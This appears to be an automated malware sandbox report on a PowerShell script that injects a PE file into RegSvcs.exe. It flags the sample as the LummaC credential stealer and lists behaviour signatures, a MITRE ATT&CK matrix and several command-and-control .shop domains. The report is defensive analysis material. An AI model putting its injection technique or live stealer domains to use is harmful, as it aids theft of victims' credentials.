Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848CE540F push ds; retf	0_2_00007FF848CE5411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848CE4C00 push E8FFFFFFh; iretd	0_2_00007FF848CE4C0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848CE00BD pushad ; iretd	0_2_00007FF848CE00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	3_2_00441853

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3244			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4203			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.2109373045.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2106289136.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004402C0 LdrInitializeThunk,

3_2_004402C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: robinsharez.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: handscreamny.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chipdonkeruz.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: versersleep.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crowdwarek.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: apporholis.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: femalsabler.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soundtappysk.shop
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: letterdrive.shop

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 447000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 455000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9EB008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
176.113.115.170_3.ps1	8%	ReversingLabs
176.113.115.170_3.ps1	35%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
letterdrive.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
letterdrive.shop	unknown	unknown	true	unknown
femalsabler.shop	unknown	unknown	false	high
robinsharez.shop	unknown	unknown	false	high
soundtappysk.shop	unknown	unknown	false	high
crowdwarek.shop	unknown	unknown	false	high
versersleep.shop	unknown	unknown	false	high
chipdonkeruz.shop	unknown	unknown	false	high
apporholis.shop	unknown	unknown	false	high
handscreamny.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
robinsharez.shop	false		high
versersleep.shop	false		high
crowdwarek.shop	false		high
letterdrive.shop	true	Avira URL Cloud: malware	unknown
femalsabler.shop	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
soundtappysk.shop	false		high
apporholis.shop	false		high
handscreamny.shop	false		high
chipdonkeruz.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://player.vimeo.com	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.gstatic.cn/recaptcha/	RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	false	high
